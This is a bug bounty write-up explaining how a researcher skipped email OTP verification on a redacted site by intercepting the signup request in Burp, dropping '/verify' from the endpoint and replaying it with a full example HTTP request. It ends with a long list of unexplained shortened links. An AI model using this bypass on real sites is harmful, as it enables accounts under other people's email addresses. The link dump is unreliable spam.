Today I would like to share one of the awesome findings by my fellow researcher friend that he came across in one of the private programs, where he was able to bypass the email verification phase implemented by the application.
Before getting started let me tell you about –
Forced Browsing:
Forced browsing is an attack technique against badly protected websites and web applications, which allows the attacker to access resources that they should not be able to access. Forced browsing is a common web application security issue caused by careless coding.
Let’s get started::
let’s consider the target as redacted.com
Normal SIGNUP flow:
In order to create a new account, the user has to enter the 6 Digit OTP sent to the email address. Only if the user enters a valid OTP then a valid account will be created for that email address.
But, I observed that via forced browsing it is possible to create a valid account using any email address without entering the OTP.
Exploitation:
1) Navigate to the signup page
2) click on signup with email
3) Fill all the details like username, email address & password.
4) Now, Turn ON the burp Intercept.
5) Click on Create account
6) Capture the particular POST Request made to the endpoint POST /_api/signup/verify
Now Remove the /verify from the POST Request
In the body of that post request add “password”:”anypassword” without any syntax mistakes. The final request should be like as shown below
POST /_ajax/signup HTTP/1.1
Host: www.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.redacted.com/en_in/
Content-Type: application/json;charset=UTF-8
Content-Length: 94
Origin: https://www.redacted.com
DNT: 1
Connection: close
{“xxxx”:”xxxxx”,”sxxxxe”:”xx-xx-xx”,”email”:”asalsflab@gmails.com”,”password”:”Password@123″}
Pass the modified request to the server.
Now, navigate to the login page and login using email address and password.
Hope you guys enjoyed it!
https://shorturl.fm/Qhtr4
https://shorturl.fm/Fh22B
https://shorturl.fm/gp7dV
https://shorturl.fm/WvhsU
https://shorturl.fm/P9AzP
https://shorturl.fm/QRZiX
https://shorturl.fm/YJIwI
https://shorturl.fm/rEugo
https://shorturl.fm/5xw4O
https://shorturl.fm/vQom7
https://shorturl.fm/lmhIA
https://shorturl.fm/NX529
https://shorturl.fm/PgYeQ
https://shorturl.fm/wKBkv
https://shorturl.fm/679Xf
https://shorturl.fm/wWhvM
https://shorturl.fm/EVZG9
https://shorturl.fm/wWrSc
https://shorturl.fm/Ru9Rx
https://shorturl.fm/UutO6
https://shorturl.fm/hnGMk
https://shorturl.fm/9HDFG
https://shorturl.fm/Qrpvj
https://shorturl.fm/aMfa1
https://shorturl.fm/xzeLw
https://shorturl.fm/x07Li
https://shorturl.fm/iqJl7
https://shorturl.fm/h3yya
https://shorturl.fm/brTUp
https://shorturl.fm/4xteM
https://shorturl.fm/DXsGe
https://shorturl.fm/WjcGq
https://shorturl.fm/2P2nt
https://shorturl.fm/PdcQf
https://shorturl.fm/3TgBO